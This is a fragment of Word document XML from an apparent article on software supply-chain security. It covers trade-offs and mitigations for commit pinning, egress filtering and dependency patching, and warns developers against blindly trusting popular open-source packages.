              <w:t>Commit</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Pinning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AEA0928" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Build Pipeline Latency:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Verifying deep transitive</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>dependency trees and</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>checking cryptographic</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>signatures (e.g., via</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Cosign/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Sigstore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>) adds</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>processing steps, increasing</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>CI/CD execution time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F6DEE64" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Parallelized Caching Layers:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Utilize specialized CI/CD caching</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>layers that store pre-verified,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>cryptographically signed dependency</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>layers, skipping full downloads and</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>network validation loops unless a</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>lockfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> hash actually changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="06FB0B9F" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D646605" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Default-Deny</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Network Egress</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FAA9751" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Operational Friction:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Blocking servers from</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>reaching the open internet</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>means third-party API</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>changes or new library</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>endpoints instantly fail unless</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>network rules are manually</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>updated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E7C05E5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Dynamic Egress Proxies</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(Infrastructure as Code):</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Manage</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">outbound whitelists strictly via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>IaC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>templates alongside the code. Allow</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>developers to declare required</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>outbound domains in their service</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>configurations, automating</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>WAF/proxy updates during peer-</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>reviewed deployments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="765245FA" w14:textId="77777777" w:rsidTr="00B064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F975AD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Aggressive</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Security</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Dependency</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Patching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68246069" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>UX &amp; Stability Risks</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(Regression):</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Upgrading</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>libraries immediately when a</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>patch drops can break</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>backward compatibility,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>causing silent application</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>bugs or production downtime.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="569391EE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Staged Deployments &amp; Automated</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Testing:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Never</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> push dependency</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>changes globally. Route updates</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>through robust integration test suites</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">and deploy </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>via</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Canary</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Rollouts</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>exposing the new dependencies to</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>only 1% to 5% of traffic initially to</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>monitor for anomalies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D5384F3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Developer Education: The Number One Misconception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1820454E"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 xml:space="preserve">The most dangerous misconception among developers regarding supply chain security is: </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>"If it's a top-tier package from a public registry, it is safe to trust implicitly."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F91D0"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The Misconception: The Halo Effect of Open Source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55598F2F"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Developers frequently assume that highly popular open-source packages—maintained by large communities or backed by major technology foundations—are naturally immune to malicious intent or structural compromises. They download packages with millions of weekly installations without checking their direct code changes or validation habits, assuming that "someone else" must have audited the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D6E7DF"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Why It Backfires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8A4222"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 xml:space="preserve">Threat actors actively target the "Halo Effect." Rather than trying to hack an enterprise perimeter directly, they look for popular, small utility packages that are maintained by a </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>single, burned-out developer. By gaining access to that developer's registry account or pull-request pipeline, the attacker can release a minor patch update containing a malicious backdoor.</w:t>
      </w:r>
    </w:p>
